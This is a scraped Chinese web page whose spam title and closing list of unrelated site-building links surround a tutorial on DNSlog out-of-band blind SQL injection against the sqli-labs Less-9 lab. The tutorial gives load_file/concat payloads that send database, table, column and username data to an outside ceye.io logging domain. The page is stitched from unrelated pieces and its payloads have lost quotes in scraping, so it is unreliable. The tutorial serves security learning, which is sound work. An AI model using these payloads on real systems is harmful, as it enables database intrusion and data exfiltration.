当前位置: 首页 > news >正文

做美妆网站名称wordpress 视频 广告插件

news 2025/11/9 5:55:20
做美妆网站名称,wordpress 视频 广告插件,网站应急响应机制建设情况,泰安招聘网最新招聘信息兼职招聘dnslog盲注dnslog注入原理DNSlog工具什么情况下使用dnslog注入#xff1f;Mysql DNSlog原理图DNSlog盲注利用条件DNSlog盲注操作方式实战演练查询当前数据库名#xff1a;查询当前数据库的第一个表名#xff1a;查询第users表一个列名#xff1a;查询users表的username列的… dnslog盲注dnslog注入原理DNSlog工具什么情况下使用dnslog注入Mysql DNSlog原理图DNSlog盲注利用条件DNSlog盲注操作方式实战演练查询当前数据库名查询当前数据库的第一个表名查询第users表一个列名查询users表的username列的数据需要注意的点dnslog注入原理 通过子查询将内容拼接到域名内让load_file()去访问共享文件访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件通过拼接出函数做查询,拼接到域名中访问时将访问服务器记录后查看日志 DNSlog工具 如果有自己的服务器和域名可以自建一个这样的平台直接使用BugScan团队开源的工具搭建即可 https://github.com/BugScanTeam/DNSLog 另外我们也可以使用在线平台 http://ceye.io http://www.dnslog.cn 什么情况下使用dnslog注入 大家在渗透测试的时候可能会遇到一下这些情况 1挖到一个有SQL盲注的站点可是用sqlmap跑需要频繁请求最后导致ip被ban 2发现疑似命令注入的洞但是目标站点什么也不显示无法确认是不是有洞 总之就是目标不让信息显示出来如果能发送请求那么就可以尝试咱这个办法——用DNSlog来获取回显 1SQL注入中的盲注 2XSS盲打 3无回显的命令执行 4无回显的SSRF 5无回显的XXEBlind XXE Mysql DNSlog原理图 DNSlog盲注利用条件 mysql.ini中secure_file_priv必须为空 1当secure_file_priv为null不允许导入导出 2当secure_file_priv为/tmp导入导出只能在/tmp目录下。 3当secure_file_priv为空则不作限制允许导入导出注意NULL不是我们要的空NULL和空的类型不一样 DNSlog盲注操作方式 Payload1 下面展示一些 内联代码片。 ?Id1’and load_file(concat(\\\\,(select database()),.c4d3hg.ceye.io\\sql))--相应的更换 select database()查询语句便可以实现DNS外带的回显注入其中1ilizz.dnslog.cn为ceye.io平台给每个账号的昵称 查询当前数据库 and load_file(concat(\\\\,(select database()),.c4d3hg.ceye.io\\sql))--//xtftm5.ceye.io根据ceye平台给你的域名更改\sql是域名目录随意即可select database()换成sql注入payload即可 查询表名 and load_file(concat(\\\\,(select table_name from information_schema.tables where table_schemasecuritylimit 0,1),.c4d3hg.ceye.io\\sql))--查询列名 and load_file(concat(\\\\,(select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),.c4d3hg.ceye.io\\sql))--查询数据 and load_file(concat(\\\\,(select username from users limit 0,1),.c4d3hg.ceye.io\\sql))--Payload2 and (select load_file(concat(\\\\,(select database()),.c4d3hg.ceye.io\\aaa)))#原理跟上面差不多 实战演练 Sqllab的第9关 这里就要借用一个平台http://ceye.io 查询当前数据库名 http://127.0.0.1/sqllab/Less-9/?id1 and load_file(concat(\\\\,(select database()),.c4d3hg.ceye.io\\sql))--回显数据 查询当前数据库的第一个表名 http://127.0.0.1/sqllab/Less-9/?id1 and load_file(concat(\\\\,(select table_name from information_schema.tables where table_schemasecuritylimit 0,1),.c4d3hg.ceye.io\\sql))--可以看到这里成返回了第一个表的名字 依次类推可以推出users表 查询第users表一个列名 http://127.0.0.1/sqllab/Less-9/?id1 and load_file(concat(\\\\,(select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),.c4d3hg.ceye.io\\sql))--查询users表的username列的数据 http://127.0.0.1/sqllab/Less-9/?id1 and load_file(concat(\\\\,(select username from users limit 0,1),.c4d3hg.ceye.io\\sql))--需要注意的点 1.查询当前用户时,因为结果中有符号使用dnslog注入时需要使用hex函数进行转码再将查询到的hex转码后的数据解码即可如下 如果使用group_concat函数进行快读查询也同样需要hex转码利用如下 http://127.0.0.1/sqllab/Less-9/?id1and load_file(concat(\\\\,(select hex(group_concat(table_name)) from information_schema.tables where table_schemasecurity),.c4d3hg.ceye.io\\sql))--查询到的是hex编码的结果
http://www.pierceye.com/news/429579/

相关文章:

  • 郑州app开发公司排名网站seo 文章转载 修改标题
  • 深圳网站备案查询成都建设施工安全协会网站
  • 做视频找素材的网站有哪些邢台做网站多少钱
  • 创世网站建设公司设计理念页面设计
  • 免费的网站模板昆明装饰企业网络推广
  • 怎样用微信做购物网站广州菜谱制作公司
  • 视频网站发展好应该怎么做wordpress移动支付免费
  • 青岛网站设计案例wordpress 转换成小程序
  • 展览中心网站建设优质的成都网站建设推
  • 建材网站模板济南建设集团网站
  • 合肥市建设建筑网站wordpress医院主题
  • 做ui要上那些网站完全免费网站源码
  • 集团企业网站建设建立网站有哪些步骤
  • 如何做自己的网站整合营销和链路营销
  • 外贸网站的公司介绍响应式布局代码例子
  • 校园网站的意义保定建设厅网站
  • 网站域名注册后怎么打开网站ip安装wordpress
  • 山西太原做网站网站开发上线流程
  • 江门网站建设多少钱网页服务器一年多少钱
  • 网站开发属于什么行业农商网站建设个人总结
  • 网站建设业务开展方案昆明市城市基本建设档案馆网站
  • 湖南网站托管做招聘网站排名
  • 主机屋免费网站空间网站建设安全标准
  • .net cms网站管理系统生态养殖网站模板
  • 国外网站一般公司网站是什么设计师做
  • 备案停止网站网站建设研究课题
  • 个人网站开发是学什么语言网站建设 总体思路
  • 网站怎么留住用户在什么地方可以接到做网站的活
  • jsp页面如何做网站pv统计wordpress4.7.10
  • 澄海网站建设用asp做网站怎么美观